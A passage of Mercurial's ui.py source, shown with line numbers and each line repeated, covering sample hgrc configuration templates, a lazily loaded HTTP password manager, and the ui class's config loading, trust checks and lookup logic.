73 # Refuse to perform an `hg update` that would cause a file content merge
73 # Refuse to perform an `hg update` that would cause a file content merge
74 update.check = noconflict
74 update.check = noconflict
75 # Show conflicts information in `hg status`
75 # Show conflicts information in `hg status`
76 status.verbose = True
76 status.verbose = True
77 # Make `hg resolve` with no action (like `-m`) fail instead of re-merging.
77 # Make `hg resolve` with no action (like `-m`) fail instead of re-merging.
78 resolve.explicit-re-merge = True
78 resolve.explicit-re-merge = True
79
79
80 [diff]
80 [diff]
81 git = 1
81 git = 1
82 showfunc = 1
82 showfunc = 1
83 word-diff = 1
83 word-diff = 1
84 """
84 """
85
85
86 samplehgrcs = {
86 samplehgrcs = {
87 b'user': b"""# example user config (see 'hg help config' for more info)
87 b'user': b"""# example user config (see 'hg help config' for more info)
88 [ui]
88 [ui]
89 # name and email, e.g.
89 # name and email, e.g.
90 # username = Jane Doe <jdoe@example.com>
90 # username = Jane Doe <jdoe@example.com>
91 username =
91 username =
92
92
93 # We recommend enabling tweakdefaults to get slight improvements to
93 # We recommend enabling tweakdefaults to get slight improvements to
94 # the UI over time. Make sure to set HGPLAIN in the environment when
94 # the UI over time. Make sure to set HGPLAIN in the environment when
95 # writing scripts!
95 # writing scripts!
96 # tweakdefaults = True
96 # tweakdefaults = True
97
97
98 # uncomment to disable color in command output
98 # uncomment to disable color in command output
99 # (see 'hg help color' for details)
99 # (see 'hg help color' for details)
100 # color = never
100 # color = never
101
101
102 # uncomment to disable command output pagination
102 # uncomment to disable command output pagination
103 # (see 'hg help pager' for details)
103 # (see 'hg help pager' for details)
104 # paginate = never
104 # paginate = never
105
105
106 [extensions]
106 [extensions]
107 # uncomment the lines below to enable some popular extensions
107 # uncomment the lines below to enable some popular extensions
108 # (see 'hg help extensions' for more info)
108 # (see 'hg help extensions' for more info)
109 #
109 #
110 # histedit =
110 # histedit =
111 # rebase =
111 # rebase =
112 # uncommit =
112 # uncommit =
113 """,
113 """,
114 b'cloned': b"""# example repository config (see 'hg help config' for more info)
114 b'cloned': b"""# example repository config (see 'hg help config' for more info)
115 [paths]
115 [paths]
116 default = %s
116 default = %s
117
117
118 # path aliases to other clones of this repo in URLs or filesystem paths
118 # path aliases to other clones of this repo in URLs or filesystem paths
119 # (see 'hg help config.paths' for more info)
119 # (see 'hg help config.paths' for more info)
120 #
120 #
121 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
121 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
122 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
122 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
123 # my-clone = /home/jdoe/jdoes-clone
123 # my-clone = /home/jdoe/jdoes-clone
124
124
125 [ui]
125 [ui]
126 # name and email (local to this repository, optional), e.g.
126 # name and email (local to this repository, optional), e.g.
127 # username = Jane Doe <jdoe@example.com>
127 # username = Jane Doe <jdoe@example.com>
128 """,
128 """,
129 b'local': b"""# example repository config (see 'hg help config' for more info)
129 b'local': b"""# example repository config (see 'hg help config' for more info)
130 [paths]
130 [paths]
131 # path aliases to other clones of this repo in URLs or filesystem paths
131 # path aliases to other clones of this repo in URLs or filesystem paths
132 # (see 'hg help config.paths' for more info)
132 # (see 'hg help config.paths' for more info)
133 #
133 #
134 # default = http://example.com/hg/example-repo
134 # default = http://example.com/hg/example-repo
135 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
135 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
136 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
136 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
137 # my-clone = /home/jdoe/jdoes-clone
137 # my-clone = /home/jdoe/jdoes-clone
138
138
139 [ui]
139 [ui]
140 # name and email (local to this repository, optional), e.g.
140 # name and email (local to this repository, optional), e.g.
141 # username = Jane Doe <jdoe@example.com>
141 # username = Jane Doe <jdoe@example.com>
142 """,
142 """,
143 b'global': b"""# example system-wide hg config (see 'hg help config' for more info)
143 b'global': b"""# example system-wide hg config (see 'hg help config' for more info)
144
144
145 [ui]
145 [ui]
146 # uncomment to disable color in command output
146 # uncomment to disable color in command output
147 # (see 'hg help color' for details)
147 # (see 'hg help color' for details)
148 # color = never
148 # color = never
149
149
150 # uncomment to disable command output pagination
150 # uncomment to disable command output pagination
151 # (see 'hg help pager' for details)
151 # (see 'hg help pager' for details)
152 # paginate = never
152 # paginate = never
153
153
154 [extensions]
154 [extensions]
155 # uncomment the lines below to enable some popular extensions
155 # uncomment the lines below to enable some popular extensions
156 # (see 'hg help extensions' for more info)
156 # (see 'hg help extensions' for more info)
157 #
157 #
158 # blackbox =
158 # blackbox =
159 # churn =
159 # churn =
160 """,
160 """,
161 }
161 }
162
162
163
163
164 def _maybestrurl(maybebytes):
164 def _maybestrurl(maybebytes):
165 return pycompat.rapply(pycompat.strurl, maybebytes)
165 return pycompat.rapply(pycompat.strurl, maybebytes)
166
166
167
167
168 def _maybebytesurl(maybestr):
168 def _maybebytesurl(maybestr):
169 return pycompat.rapply(pycompat.bytesurl, maybestr)
169 return pycompat.rapply(pycompat.bytesurl, maybestr)
170
170
171
171
172 class httppasswordmgrdbproxy(object):
172 class httppasswordmgrdbproxy(object):
173 """Delays loading urllib2 until it's needed."""
173 """Delays loading urllib2 until it's needed."""
174
174
175 def __init__(self):
175 def __init__(self):
176 self._mgr = None
176 self._mgr = None
177
177
178 def _get_mgr(self):
178 def _get_mgr(self):
179 if self._mgr is None:
179 if self._mgr is None:
180 self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
180 self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
181 return self._mgr
181 return self._mgr
182
182
183 def add_password(self, realm, uris, user, passwd):
183 def add_password(self, realm, uris, user, passwd):
184 return self._get_mgr().add_password(
184 return self._get_mgr().add_password(
185 _maybestrurl(realm),
185 _maybestrurl(realm),
186 _maybestrurl(uris),
186 _maybestrurl(uris),
187 _maybestrurl(user),
187 _maybestrurl(user),
188 _maybestrurl(passwd),
188 _maybestrurl(passwd),
189 )
189 )
190
190
191 def find_user_password(self, realm, uri):
191 def find_user_password(self, realm, uri):
192 mgr = self._get_mgr()
192 mgr = self._get_mgr()
193 return _maybebytesurl(
193 return _maybebytesurl(
194 mgr.find_user_password(_maybestrurl(realm), _maybestrurl(uri))
194 mgr.find_user_password(_maybestrurl(realm), _maybestrurl(uri))
195 )
195 )
196
196
197
197
198 def _catchterm(*args):
198 def _catchterm(*args):
199 raise error.SignalInterrupt
199 raise error.SignalInterrupt
200
200
201
201
202 # unique object used to detect no default value has been provided when
202 # unique object used to detect no default value has been provided when
203 # retrieving configuration value.
203 # retrieving configuration value.
204 _unset = object()
204 _unset = object()
205
205
206 # _reqexithandlers: callbacks run at the end of a request
206 # _reqexithandlers: callbacks run at the end of a request
207 _reqexithandlers = []
207 _reqexithandlers = []
208
208
209
209
210 class ui(object):
210 class ui(object):
211 def __init__(self, src=None):
211 def __init__(self, src=None):
212 """Create a fresh new ui object if no src given
212 """Create a fresh new ui object if no src given
213
213
214 Use uimod.ui.load() to create a ui which knows global and user configs.
214 Use uimod.ui.load() to create a ui which knows global and user configs.
215 In most cases, you should use ui.copy() to create a copy of an existing
215 In most cases, you should use ui.copy() to create a copy of an existing
216 ui object.
216 ui object.
217 """
217 """
218 # _buffers: used for temporary capture of output
218 # _buffers: used for temporary capture of output
219 self._buffers = []
219 self._buffers = []
220 # 3-tuple describing how each buffer in the stack behaves.
220 # 3-tuple describing how each buffer in the stack behaves.
221 # Values are (capture stderr, capture subprocesses, apply labels).
221 # Values are (capture stderr, capture subprocesses, apply labels).
222 self._bufferstates = []
222 self._bufferstates = []
223 # When a buffer is active, defines whether we are expanding labels.
223 # When a buffer is active, defines whether we are expanding labels.
224 # This exists to prevent an extra list lookup.
224 # This exists to prevent an extra list lookup.
225 self._bufferapplylabels = None
225 self._bufferapplylabels = None
226 self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
226 self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
227 self._reportuntrusted = True
227 self._reportuntrusted = True
228 self._knownconfig = configitems.coreitems
228 self._knownconfig = configitems.coreitems
229 self._ocfg = config.config() # overlay
229 self._ocfg = config.config() # overlay
230 self._tcfg = config.config() # trusted
230 self._tcfg = config.config() # trusted
231 self._ucfg = config.config() # untrusted
231 self._ucfg = config.config() # untrusted
232 self._trustusers = set()
232 self._trustusers = set()
233 self._trustgroups = set()
233 self._trustgroups = set()
234 self.callhooks = True
234 self.callhooks = True
235 # Insecure server connections requested.
235 # Insecure server connections requested.
236 self.insecureconnections = False
236 self.insecureconnections = False
237 # Blocked time
237 # Blocked time
238 self.logblockedtimes = False
238 self.logblockedtimes = False
239 # color mode: see mercurial/color.py for possible value
239 # color mode: see mercurial/color.py for possible value
240 self._colormode = None
240 self._colormode = None
241 self._terminfoparams = {}
241 self._terminfoparams = {}
242 self._styles = {}
242 self._styles = {}
243 self._uninterruptible = False
243 self._uninterruptible = False
244
244
245 if src:
245 if src:
246 self._fout = src._fout
246 self._fout = src._fout
247 self._ferr = src._ferr
247 self._ferr = src._ferr
248 self._fin = src._fin
248 self._fin = src._fin
249 self._fmsg = src._fmsg
249 self._fmsg = src._fmsg
250 self._fmsgout = src._fmsgout
250 self._fmsgout = src._fmsgout
251 self._fmsgerr = src._fmsgerr
251 self._fmsgerr = src._fmsgerr
252 self._finoutredirected = src._finoutredirected
252 self._finoutredirected = src._finoutredirected
253 self._loggers = src._loggers.copy()
253 self._loggers = src._loggers.copy()
254 self.pageractive = src.pageractive
254 self.pageractive = src.pageractive
255 self._disablepager = src._disablepager
255 self._disablepager = src._disablepager
256 self._tweaked = src._tweaked
256 self._tweaked = src._tweaked
257
257
258 self._tcfg = src._tcfg.copy()
258 self._tcfg = src._tcfg.copy()
259 self._ucfg = src._ucfg.copy()
259 self._ucfg = src._ucfg.copy()
260 self._ocfg = src._ocfg.copy()
260 self._ocfg = src._ocfg.copy()
261 self._trustusers = src._trustusers.copy()
261 self._trustusers = src._trustusers.copy()
262 self._trustgroups = src._trustgroups.copy()
262 self._trustgroups = src._trustgroups.copy()
263 self.environ = src.environ
263 self.environ = src.environ
264 self.callhooks = src.callhooks
264 self.callhooks = src.callhooks
265 self.insecureconnections = src.insecureconnections
265 self.insecureconnections = src.insecureconnections
266 self._colormode = src._colormode
266 self._colormode = src._colormode
267 self._terminfoparams = src._terminfoparams.copy()
267 self._terminfoparams = src._terminfoparams.copy()
268 self._styles = src._styles.copy()
268 self._styles = src._styles.copy()
269
269
270 self.fixconfig()
270 self.fixconfig()
271
271
272 self.httppasswordmgrdb = src.httppasswordmgrdb
272 self.httppasswordmgrdb = src.httppasswordmgrdb
273 self._blockedtimes = src._blockedtimes
273 self._blockedtimes = src._blockedtimes
274 else:
274 else:
275 self._fout = procutil.stdout
275 self._fout = procutil.stdout
276 self._ferr = procutil.stderr
276 self._ferr = procutil.stderr
277 self._fin = procutil.stdin
277 self._fin = procutil.stdin
278 self._fmsg = None
278 self._fmsg = None
279 self._fmsgout = self.fout # configurable
279 self._fmsgout = self.fout # configurable
280 self._fmsgerr = self.ferr # configurable
280 self._fmsgerr = self.ferr # configurable
281 self._finoutredirected = False
281 self._finoutredirected = False
282 self._loggers = {}
282 self._loggers = {}
283 self.pageractive = False
283 self.pageractive = False
284 self._disablepager = False
284 self._disablepager = False
285 self._tweaked = False
285 self._tweaked = False
286
286
287 # shared read-only environment
287 # shared read-only environment
288 self.environ = encoding.environ
288 self.environ = encoding.environ
289
289
290 self.httppasswordmgrdb = httppasswordmgrdbproxy()
290 self.httppasswordmgrdb = httppasswordmgrdbproxy()
291 self._blockedtimes = collections.defaultdict(int)
291 self._blockedtimes = collections.defaultdict(int)
292
292
293 allowed = self.configlist(b'experimental', b'exportableenviron')
293 allowed = self.configlist(b'experimental', b'exportableenviron')
294 if b'*' in allowed:
294 if b'*' in allowed:
295 self._exportableenviron = self.environ
295 self._exportableenviron = self.environ
296 else:
296 else:
297 self._exportableenviron = {}
297 self._exportableenviron = {}
298 for k in allowed:
298 for k in allowed:
299 if k in self.environ:
299 if k in self.environ:
300 self._exportableenviron[k] = self.environ[k]
300 self._exportableenviron[k] = self.environ[k]
301
301
302 @classmethod
302 @classmethod
303 def load(cls):
303 def load(cls):
304 """Create a ui and load global and user configs"""
304 """Create a ui and load global and user configs"""
305 u = cls()
305 u = cls()
306 # we always trust global config files and environment variables
306 # we always trust global config files and environment variables
307 for t, f in rcutil.rccomponents():
307 for t, f in rcutil.rccomponents():
308 if t == b'path':
308 if t == b'path':
309 u.readconfig(f, trust=True)
309 u.readconfig(f, trust=True)
310 elif t == b'items':
310 elif t == b'items':
311 sections = set()
311 sections = set()
312 for section, name, value, source in f:
312 for section, name, value, source in f:
313 # do not set u._ocfg
313 # do not set u._ocfg
314 # XXX clean this up once immutable config object is a thing
314 # XXX clean this up once immutable config object is a thing
315 u._tcfg.set(section, name, value, source)
315 u._tcfg.set(section, name, value, source)
316 u._ucfg.set(section, name, value, source)
316 u._ucfg.set(section, name, value, source)
317 sections.add(section)
317 sections.add(section)
318 for section in sections:
318 for section in sections:
319 u.fixconfig(section=section)
319 u.fixconfig(section=section)
320 else:
320 else:
321 raise error.ProgrammingError(b'unknown rctype: %s' % t)
321 raise error.ProgrammingError(b'unknown rctype: %s' % t)
322 u._maybetweakdefaults()
322 u._maybetweakdefaults()
323 return u
323 return u
324
324
325 def _maybetweakdefaults(self):
325 def _maybetweakdefaults(self):
326 if not self.configbool(b'ui', b'tweakdefaults'):
326 if not self.configbool(b'ui', b'tweakdefaults'):
327 return
327 return
328 if self._tweaked or self.plain(b'tweakdefaults'):
328 if self._tweaked or self.plain(b'tweakdefaults'):
329 return
329 return
330
330
331 # Note: it is SUPER IMPORTANT that you set self._tweaked to
331 # Note: it is SUPER IMPORTANT that you set self._tweaked to
332 # True *before* any calls to setconfig(), otherwise you'll get
332 # True *before* any calls to setconfig(), otherwise you'll get
333 # infinite recursion between setconfig and this method.
333 # infinite recursion between setconfig and this method.
334 #
334 #
335 # TODO: We should extract an inner method in setconfig() to
335 # TODO: We should extract an inner method in setconfig() to
336 # avoid this weirdness.
336 # avoid this weirdness.
337 self._tweaked = True
337 self._tweaked = True
338 tmpcfg = config.config()
338 tmpcfg = config.config()
339 tmpcfg.parse(b'<tweakdefaults>', tweakrc)
339 tmpcfg.parse(b'<tweakdefaults>', tweakrc)
340 for section in tmpcfg:
340 for section in tmpcfg:
341 for name, value in tmpcfg.items(section):
341 for name, value in tmpcfg.items(section):
342 if not self.hasconfig(section, name):
342 if not self.hasconfig(section, name):
343 self.setconfig(section, name, value, b"<tweakdefaults>")
343 self.setconfig(section, name, value, b"<tweakdefaults>")
344
344
345 def copy(self):
345 def copy(self):
346 return self.__class__(self)
346 return self.__class__(self)
347
347
348 def resetstate(self):
348 def resetstate(self):
349 """Clear internal state that shouldn't persist across commands"""
349 """Clear internal state that shouldn't persist across commands"""
350 if self._progbar:
350 if self._progbar:
351 self._progbar.resetstate() # reset last-print time of progress bar
351 self._progbar.resetstate() # reset last-print time of progress bar
352 self.httppasswordmgrdb = httppasswordmgrdbproxy()
352 self.httppasswordmgrdb = httppasswordmgrdbproxy()
353
353
354 @contextlib.contextmanager
354 @contextlib.contextmanager
355 def timeblockedsection(self, key):
355 def timeblockedsection(self, key):
356 # this is open-coded below - search for timeblockedsection to find them
356 # this is open-coded below - search for timeblockedsection to find them
357 starttime = util.timer()
357 starttime = util.timer()
358 try:
358 try:
359 yield
359 yield
360 finally:
360 finally:
361 self._blockedtimes[key + b'_blocked'] += (
361 self._blockedtimes[key + b'_blocked'] += (
362 util.timer() - starttime
362 util.timer() - starttime
363 ) * 1000
363 ) * 1000
364
364
365 @contextlib.contextmanager
365 @contextlib.contextmanager
366 def uninterruptible(self):
366 def uninterruptible(self):
367 """Mark an operation as unsafe.
367 """Mark an operation as unsafe.
368
368
369 Most operations on a repository are safe to interrupt, but a
369 Most operations on a repository are safe to interrupt, but a
370 few are risky (for example repair.strip). This context manager
370 few are risky (for example repair.strip). This context manager
371 lets you advise Mercurial that something risky is happening so
371 lets you advise Mercurial that something risky is happening so
372 that control-C etc can be blocked if desired.
372 that control-C etc can be blocked if desired.
373 """
373 """
374 enabled = self.configbool(b'experimental', b'nointerrupt')
374 enabled = self.configbool(b'experimental', b'nointerrupt')
375 if enabled and self.configbool(
375 if enabled and self.configbool(
376 b'experimental', b'nointerrupt-interactiveonly'
376 b'experimental', b'nointerrupt-interactiveonly'
377 ):
377 ):
378 enabled = self.interactive()
378 enabled = self.interactive()
379 if self._uninterruptible or not enabled:
379 if self._uninterruptible or not enabled:
380 # if nointerrupt support is turned off, the process isn't
380 # if nointerrupt support is turned off, the process isn't
381 # interactive, or we're already in an uninterruptible
381 # interactive, or we're already in an uninterruptible
382 # block, do nothing.
382 # block, do nothing.
383 yield
383 yield
384 return
384 return
385
385
386 def warn():
386 def warn():
387 self.warn(_(b"shutting down cleanly\n"))
387 self.warn(_(b"shutting down cleanly\n"))
388 self.warn(
388 self.warn(
389 _(b"press ^C again to terminate immediately (dangerous)\n")
389 _(b"press ^C again to terminate immediately (dangerous)\n")
390 )
390 )
391 return True
391 return True
392
392
393 with procutil.uninterruptible(warn):
393 with procutil.uninterruptible(warn):
394 try:
394 try:
395 self._uninterruptible = True
395 self._uninterruptible = True
396 yield
396 yield
397 finally:
397 finally:
398 self._uninterruptible = False
398 self._uninterruptible = False
399
399
400 def formatter(self, topic, opts):
400 def formatter(self, topic, opts):
401 return formatter.formatter(self, self, topic, opts)
401 return formatter.formatter(self, self, topic, opts)
402
402
403 def _trusted(self, fp, f):
403 def _trusted(self, fp, f):
404 st = util.fstat(fp)
404 st = util.fstat(fp)
405 if util.isowner(st):
405 if util.isowner(st):
406 return True
406 return True
407
407
408 tusers, tgroups = self._trustusers, self._trustgroups
408 tusers, tgroups = self._trustusers, self._trustgroups
409 if b'*' in tusers or b'*' in tgroups:
409 if b'*' in tusers or b'*' in tgroups:
410 return True
410 return True
411
411
412 user = util.username(st.st_uid)
412 user = util.username(st.st_uid)
413 group = util.groupname(st.st_gid)
413 group = util.groupname(st.st_gid)
414 if user in tusers or group in tgroups or user == util.username():
414 if user in tusers or group in tgroups or user == util.username():
415 return True
415 return True
416
416
417 if self._reportuntrusted:
417 if self._reportuntrusted:
418 self.warn(
418 self.warn(
419 _(
419 _(
420 b'not trusting file %s from untrusted '
420 b'not trusting file %s from untrusted '
421 b'user %s, group %s\n'
421 b'user %s, group %s\n'
422 )
422 )
423 % (f, user, group)
423 % (f, user, group)
424 )
424 )
425 return False
425 return False
426
426
427 def readconfig(
427 def readconfig(
428 self, filename, root=None, trust=False, sections=None, remap=None
428 self, filename, root=None, trust=False, sections=None, remap=None
429 ):
429 ):
430 try:
430 try:
431 fp = open(filename, 'rb')
431 fp = open(filename, 'rb')
432 except IOError:
432 except IOError:
433 if not sections: # ignore unless we were looking for something
433 if not sections: # ignore unless we were looking for something
434 return
434 return
435 raise
435 raise
436
436
437 with fp:
437 with fp:
438 cfg = config.config()
438 cfg = config.config()
439 trusted = sections or trust or self._trusted(fp, filename)
439 trusted = sections or trust or self._trusted(fp, filename)
440
440
441 try:
441 try:
442 cfg.read(filename, fp, sections=sections, remap=remap)
442 cfg.read(filename, fp, sections=sections, remap=remap)
443 except error.ParseError as inst:
443 except error.ParseError as inst:
444 if trusted:
444 if trusted:
445 raise
445 raise
446 self.warn(_(b'ignored: %s\n') % stringutil.forcebytestr(inst))
446 self.warn(_(b'ignored: %s\n') % stringutil.forcebytestr(inst))
447
447
448 if self.plain():
448 if self.plain():
449 for k in (
449 for k in (
450 b'debug',
450 b'debug',
451 b'fallbackencoding',
451 b'fallbackencoding',
452 b'quiet',
452 b'quiet',
453 b'slash',
453 b'slash',
454 b'logtemplate',
454 b'logtemplate',
455 b'message-output',
455 b'message-output',
456 b'statuscopies',
456 b'statuscopies',
457 b'style',
457 b'style',
458 b'traceback',
458 b'traceback',
459 b'verbose',
459 b'verbose',
460 ):
460 ):
461 if k in cfg[b'ui']:
461 if k in cfg[b'ui']:
462 del cfg[b'ui'][k]
462 del cfg[b'ui'][k]
463 for k, v in cfg.items(b'defaults'):
463 for k, v in cfg.items(b'defaults'):
464 del cfg[b'defaults'][k]
464 del cfg[b'defaults'][k]
465 for k, v in cfg.items(b'commands'):
465 for k, v in cfg.items(b'commands'):
466 del cfg[b'commands'][k]
466 del cfg[b'commands'][k]
467 # Don't remove aliases from the configuration if in the exceptionlist
467 # Don't remove aliases from the configuration if in the exceptionlist
468 if self.plain(b'alias'):
468 if self.plain(b'alias'):
469 for k, v in cfg.items(b'alias'):
469 for k, v in cfg.items(b'alias'):
470 del cfg[b'alias'][k]
470 del cfg[b'alias'][k]
471 if self.plain(b'revsetalias'):
471 if self.plain(b'revsetalias'):
472 for k, v in cfg.items(b'revsetalias'):
472 for k, v in cfg.items(b'revsetalias'):
473 del cfg[b'revsetalias'][k]
473 del cfg[b'revsetalias'][k]
474 if self.plain(b'templatealias'):
474 if self.plain(b'templatealias'):
475 for k, v in cfg.items(b'templatealias'):
475 for k, v in cfg.items(b'templatealias'):
476 del cfg[b'templatealias'][k]
476 del cfg[b'templatealias'][k]
477
477
478 if trusted:
478 if trusted:
479 self._tcfg.update(cfg)
479 self._tcfg.update(cfg)
480 self._tcfg.update(self._ocfg)
480 self._tcfg.update(self._ocfg)
481 self._ucfg.update(cfg)
481 self._ucfg.update(cfg)
482 self._ucfg.update(self._ocfg)
482 self._ucfg.update(self._ocfg)
483
483
484 if root is None:
484 if root is None:
485 root = os.path.expanduser(b'~')
485 root = os.path.expanduser(b'~')
486 self.fixconfig(root=root)
486 self.fixconfig(root=root)
487
487
488 def fixconfig(self, root=None, section=None):
488 def fixconfig(self, root=None, section=None):
489 if section in (None, b'paths'):
489 if section in (None, b'paths'):
490 # expand vars and ~
490 # expand vars and ~
491 # translate paths relative to root (or home) into absolute paths
491 # translate paths relative to root (or home) into absolute paths
492 root = root or encoding.getcwd()
492 root = root or encoding.getcwd()
493 for c in self._tcfg, self._ucfg, self._ocfg:
493 for c in self._tcfg, self._ucfg, self._ocfg:
494 for n, p in c.items(b'paths'):
494 for n, p in c.items(b'paths'):
495 # Ignore sub-options.
495 # Ignore sub-options.
496 if b':' in n:
496 if b':' in n:
497 continue
497 continue
498 if not p:
498 if not p:
499 continue
499 continue
500 if b'%%' in p:
500 if b'%%' in p:
501 s = self.configsource(b'paths', n) or b'none'
501 s = self.configsource(b'paths', n) or b'none'
502 self.warn(
502 self.warn(
503 _(b"(deprecated '%%' in path %s=%s from %s)\n")
503 _(b"(deprecated '%%' in path %s=%s from %s)\n")
504 % (n, p, s)
504 % (n, p, s)
505 )
505 )
506 p = p.replace(b'%%', b'%')
506 p = p.replace(b'%%', b'%')
507 p = util.expandpath(p)
507 p = util.expandpath(p)
508 if not util.hasscheme(p) and not os.path.isabs(p):
508 if not util.hasscheme(p) and not os.path.isabs(p):
509 p = os.path.normpath(os.path.join(root, p))
509 p = os.path.normpath(os.path.join(root, p))
510 c.set(b"paths", n, p)
510 c.set(b"paths", n, p)
511
511
512 if section in (None, b'ui'):
512 if section in (None, b'ui'):
513 # update ui options
513 # update ui options
514 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
514 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
515 self.debugflag = self.configbool(b'ui', b'debug')
515 self.debugflag = self.configbool(b'ui', b'debug')
516 self.verbose = self.debugflag or self.configbool(b'ui', b'verbose')
516 self.verbose = self.debugflag or self.configbool(b'ui', b'verbose')
517 self.quiet = not self.debugflag and self.configbool(b'ui', b'quiet')
517 self.quiet = not self.debugflag and self.configbool(b'ui', b'quiet')
518 if self.verbose and self.quiet:
518 if self.verbose and self.quiet:
519 self.quiet = self.verbose = False
519 self.quiet = self.verbose = False
520 self._reportuntrusted = self.debugflag or self.configbool(
520 self._reportuntrusted = self.debugflag or self.configbool(
521 b"ui", b"report_untrusted"
521 b"ui", b"report_untrusted"
522 )
522 )
523 self.tracebackflag = self.configbool(b'ui', b'traceback')
523 self.tracebackflag = self.configbool(b'ui', b'traceback')
524 self.logblockedtimes = self.configbool(b'ui', b'logblockedtimes')
524 self.logblockedtimes = self.configbool(b'ui', b'logblockedtimes')
525
525
526 if section in (None, b'trusted'):
526 if section in (None, b'trusted'):
527 # update trust information
527 # update trust information
528 self._trustusers.update(self.configlist(b'trusted', b'users'))
528 self._trustusers.update(self.configlist(b'trusted', b'users'))
529 self._trustgroups.update(self.configlist(b'trusted', b'groups'))
529 self._trustgroups.update(self.configlist(b'trusted', b'groups'))
530
530
531 if section in (None, b'devel', b'ui') and self.debugflag:
531 if section in (None, b'devel', b'ui') and self.debugflag:
532 tracked = set()
532 tracked = set()
533 if self.configbool(b'devel', b'debug.extensions'):
533 if self.configbool(b'devel', b'debug.extensions'):
534 tracked.add(b'extension')
534 tracked.add(b'extension')
535 if tracked:
535 if tracked:
536 logger = loggingutil.fileobjectlogger(self._ferr, tracked)
536 logger = loggingutil.fileobjectlogger(self._ferr, tracked)
537 self.setlogger(b'debug', logger)
537 self.setlogger(b'debug', logger)
538
538
539 def backupconfig(self, section, item):
539 def backupconfig(self, section, item):
540 return (
540 return (
541 self._ocfg.backup(section, item),
541 self._ocfg.backup(section, item),
542 self._tcfg.backup(section, item),
542 self._tcfg.backup(section, item),
543 self._ucfg.backup(section, item),
543 self._ucfg.backup(section, item),
544 )
544 )
545
545
546 def restoreconfig(self, data):
546 def restoreconfig(self, data):
547 self._ocfg.restore(data[0])
547 self._ocfg.restore(data[0])
548 self._tcfg.restore(data[1])
548 self._tcfg.restore(data[1])
549 self._ucfg.restore(data[2])
549 self._ucfg.restore(data[2])
550
550
551 def setconfig(self, section, name, value, source=b''):
551 def setconfig(self, section, name, value, source=b''):
552 for cfg in (self._ocfg, self._tcfg, self._ucfg):
552 for cfg in (self._ocfg, self._tcfg, self._ucfg):
553 cfg.set(section, name, value, source)
553 cfg.set(section, name, value, source)
554 self.fixconfig(section=section)
554 self.fixconfig(section=section)
555 self._maybetweakdefaults()
555 self._maybetweakdefaults()
556
556
557 def _data(self, untrusted):
557 def _data(self, untrusted):
558 return untrusted and self._ucfg or self._tcfg
558 return untrusted and self._ucfg or self._tcfg
559
559
560 def configsource(self, section, name, untrusted=False):
560 def configsource(self, section, name, untrusted=False):
561 return self._data(untrusted).source(section, name)
561 return self._data(untrusted).source(section, name)
562
562
563 def config(self, section, name, default=_unset, untrusted=False):
563 def config(self, section, name, default=_unset, untrusted=False):
564 """return the plain string version of a config"""
564 """return the plain string version of a config"""
565 value = self._config(
565 value = self._config(
566 section, name, default=default, untrusted=untrusted
566 section, name, default=default, untrusted=untrusted
567 )
567 )
568 if value is _unset:
568 if value is _unset:
569 return None
569 return None
570 return value
570 return value
571
571
572 def _config(self, section, name, default=_unset, untrusted=False):
572 def _config(self, section, name, default=_unset, untrusted=False):
573 value = itemdefault = default
573 value = itemdefault = default
574 item = self._knownconfig.get(section, {}).get(name)
574 item = self._knownconfig.get(section, {}).get(name)
575 alternates = [(section, name)]
575 alternates = [(section, name)]
576
576
577 if item is not None:
577 if item is not None:
578 alternates.extend(item.alias)
578 alternates.extend(item.alias)
579 if callable(item.default):
579 if callable(item.default):
580 itemdefault = item.default()
580 itemdefault = item.default()
581 else:
581 else:
582 itemdefault = item.default
582 itemdefault = item.default
583 else:
583 else:
584 msg = b"accessing unregistered config item: '%s.%s'"
584 msg = b"accessing unregistered config item: '%s.%s'"
585 msg %= (section, name)
585 msg %= (section, name)
586 self.develwarn(msg, 2, b'warn-config-unknown')
586 self.develwarn(msg, 2, b'warn-config-unknown')
587
587
588 if default is _unset:
588 if default is _unset:
589 if item is None:
589 if item is None:
590 value = default
590 value = default
591 elif item.default is configitems.dynamicdefault:
591 elif item.default is configitems.dynamicdefault:
592 value = None
592 value = None
593 msg = b"config item requires an explicit default value: '%s.%s'"
593 msg = b"config item requires an explicit default value: '%s.%s'"
594 msg %= (section, name)
594 msg %= (section, name)
595 self.develwarn(msg, 2, b'warn-config-default')
595 self.develwarn(msg, 2, b'warn-config-default')
596 else:
596 else:
597 value = itemdefault
597 value = itemdefault
598 elif (
598 elif (
599 item is not None
599 item is not None
600 and item.default is not configitems.dynamicdefault
600 and item.default is not configitems.dynamicdefault
601 and default != itemdefault
601 and default != itemdefault
602 ):
602 ):
603 msg = (
603 msg = (
604 b"specifying a mismatched default value for a registered "
604 b"specifying a mismatched default value for a registered "
605 b"config item: '%s.%s' '%s'"
605 b"config item: '%s.%s' '%s'"
606 )
606 )
607 msg %= (section, name, pycompat.bytestr(default))
607 msg %= (section, name, pycompat.bytestr(default))
608 self.develwarn(msg, 2, b'warn-config-default')
608 self.develwarn(msg, 2, b'warn-config-default')
609
609
610 for s, n in alternates:
610 for s, n in alternates:
611 candidate = self._data(untrusted).get(s, n, None)
611 candidate = self._data(untrusted).get(s, n, None)
612 if candidate is not None:
612 if candidate is not None:
613 value = candidate
613 value = candidate
614 break
614 break
615
615
616 if self.debugflag and not untrusted and self._reportuntrusted:
616 if self.debugflag and not untrusted and self._reportuntrusted:
617 for s, n in alternates:
617 for s, n in alternates:
618 uvalue = self._ucfg.get(s, n)
618 uvalue = self._ucfg.get(s, n)
619 if uvalue is not None and uvalue != value:
619 if uvalue is not None and uvalue != value:
620 self.debug(
620 self.debug(
621 b"ignoring untrusted configuration option "
621 b"ignoring untrusted configuration option "
622 b"%s.%s = %s\n" % (s, n, uvalue)
622 b"%s.%s = %s\n" % (s, n, uvalue)
623 )
623 )
624 return value
624 return value
625
625
626 def configsuboptions(self, section, name, default=_unset, untrusted=False):
